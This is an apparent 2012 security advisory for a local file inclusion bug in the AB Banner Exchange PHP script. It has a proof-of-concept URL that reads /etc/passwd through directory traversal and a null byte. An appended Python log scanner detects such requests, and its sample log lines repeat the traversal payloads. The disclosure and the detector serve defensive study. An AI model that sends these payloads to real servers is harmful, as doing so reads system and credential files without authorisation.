-----------------------------------------------------------
AB Banner Exchange (index.php page) Local file inclusion
Bug discovered by Yakir Wizman
Date 24/08/2012
Vendor Homepage - http://www.abscripts.com/ab-banner-exchange/
Demo - http://www.scripts-demo.com/ab-banner-exchange/
ISRAEL
-----------------------------------------------------------
Author will not be responsible for any damage.
-----------------------------------------------------------

About the Application
-----------------------------------------------------------
AB Banner Exchange is an advanced PHP script for running your own banner exchange system.


Proof Of Concept
-----------------------------------------------------------
Local file inclusion (Severity is high)
Vulnerable URL : http://server/ab-banner-exchange/index.php?page=../../../../../../../../../../etc/passwd%00
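
Detection example (added here, not part of the original advisory and not vendor code): a log check that flags requests to index.php whose "page" parameter contains directory traversal, a null byte or an absolute path, including double-encoded forms. The combined access-log format, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def page_param_findings(target):
    """Return sorted reasons why the `page` parameter looks like file inclusion abuse."""
    parts = urlsplit(target)
    if not parts.path.endswith("/index.php"):
        return []
    findings = set()
    for pair in parts.query.split("&"):  # split the raw query; decoding happens below
        name, _, raw = pair.partition("=")
        if fully_decode(name) != "page":
            continue
        value = fully_decode(raw)
        if ".." in re.split(r"[\\/]", value):
            findings.add("traversal")
        if "\x00" in value:
            findings.add("null-byte")
        if value.startswith(("/", "\\")):
            findings.add("absolute-path")
    return sorted(findings)

def scan(log_lines):
    """Return (line_number, reasons) for every suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        reasons = page_param_findings(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Aug/2012:10:00:01 +0000] "GET /ab-banner-exchange/index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Aug/2012:10:00:05 +0000] "GET /ab-banner-exchange/index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '198.51.100.7 - - [24/Aug/2012:10:00:09 +0000] "GET /ab-banner-exchange/index.php?page=%252e%252e%252fconfig HTTP/1.1" 200 312',
]
```

Calling scan(SAMPLE_LOG) reports lines 2 and 3; a 200 response on a flagged line is worth checking against the response size for that page.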